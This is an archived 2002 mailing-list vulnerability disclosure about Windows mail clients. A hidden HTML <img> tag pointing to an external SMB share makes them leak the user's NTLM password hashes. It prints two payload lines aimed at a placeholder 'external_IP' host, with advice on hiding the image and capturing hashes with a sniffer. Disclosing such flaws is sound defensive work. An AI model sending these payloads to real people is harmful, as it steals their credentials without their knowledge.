Hijacking the hashes : multiple windows mail clients vulnerability

From: overclocking_a_la_abuelaat_private
Date: Wed Jul 03 2002 - 09:34:26 PDT

  • Next message: Felipe Franciosi: "Re: Possible flaw in XFree?"

    
     ('binary' encoding is not supported, stored as-is)
    Hi men !
    
    Some time ago, Windows 2000 was kicked with a vulnerability that allowed 
    an attacker to force a telnet session  to an external server. The telnet 
    client tried to validate sending the hashes of the user... This could be 
    exploited with a simple javascript "open.window("telnet://>")" in an 
    HTML formatted mail or with the very rude method of a link pointing to an 
    URL using telnet scheme.
    Microsoft patched it and now windows 2000 asks you if you want to send 
    your pawword,.... emmm, no thanks !  ;-)
    
    So, what about if there was another  method to force a user on a windows 
    box to send you his hashes, without his knowledge, without using any 
    interactive method, non javascript, non activeX, non some lame social 
    engeneering technique... only HTML ?
    
    Here you have another flaw that is present on almost every Windows box 
    that can be exploited to obtain the user´s password´s challenge/response 
    hashes.
    Everybody knows that if a windows machine wants to access a SMB resource, 
    always tries to connect first using the password of the user logued in. 
    This "feature" is transparent to the user, so he never gets prompted to 
    something like : "WARNING: you are about to send your password...". 
    
    OK, that`s what we have found :
    simply send a html formatted mail message that includes this code :
    
    1st) <img src="file://\\\\external_IP\\resource"> or 2nd) <img 
    src="\\\\external_IP\\resource">.
    
    To make it "invisible" reduce the size of the "image" to the min.
    
    On mail clients that works with IE engine both methods seems to work : 
    outlook, outlook express,...
    
    Any other web mail system  when using IE will  be forced to send hashes ( 
    tested with Outlook Web Access, Hotmail, ... ) unless the mail web server 
    does any kind of filtering on HTML code.
    
    On Eudora  first technique will work only if IE is selected as viewer and 
    the second one will work on both cases.
    
    An attacker only have to send you an e-mail as described before an wait 
    for your response with a network monitor ( LC3 in sniffer mode works fine 
    for this purpose ).
    
    Windows 2000 SP2 fully patched and  will be assimilated unless you force 
    strong authentication ( not  on default installation ).
    
    Of course a tightened firewall denying outgoing trafic through port TCP 
    139 will prevent this but the problem is there and Windows users are 
    exposed to the most easy way to stole their hashes : by e-mail.
    
    This vulnerability has been found by :
    
    HUGO VÁZQUEZ CARAMÉS and TONI CORTÉS.
    www.infohacking.com 2002
    Barcelona
    SPAIN
    



    This archive was generated by hypermail 2b30 : Wed Jul 03 2002 - 10:36:34 PDT